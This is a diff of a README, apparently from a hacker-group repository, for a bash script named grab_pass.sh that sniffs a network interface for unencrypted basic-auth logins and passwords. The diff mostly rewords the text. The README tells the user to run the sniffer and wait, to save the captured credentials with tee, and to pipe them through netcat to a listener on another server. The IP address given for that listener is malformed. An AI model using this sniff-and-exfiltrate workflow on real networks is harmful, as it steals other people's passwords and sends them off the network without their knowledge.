dc602/grab_pass/README.md

 # grab_pass.sh

 This is a simple script that sniffs for unencrypted basic auth logins/passwords.
-You can either just run it as is.
 The only option is the ethernet device.
 Example with eth0:

 `bash grab_pass.sh eth0`

 Now just sit back and wait.

-If you are like me, you want to keep or send those passwords somewhere.
-You can always tee it to a file:
+If you want to keep those passwords, you can always tee it to a file:

 `bash grab_pass.sh eth0 | tee logins.txt`

-or you could always setup netcat to listen on a server somewhere, then pipe the results to netcat.
-For example, if I had a listener on 10.0.0.4 running on port 5555, I would just run this:
+Or you could always setup netcat to listen on a server somewhere, then pipe the results to netcat.
+For example, if you had a listener on 10.0.0.4 running on port 5555, you could just run this:

 `bash grab_pass.sh eth0 | nc 10.0.0.0.4 5555`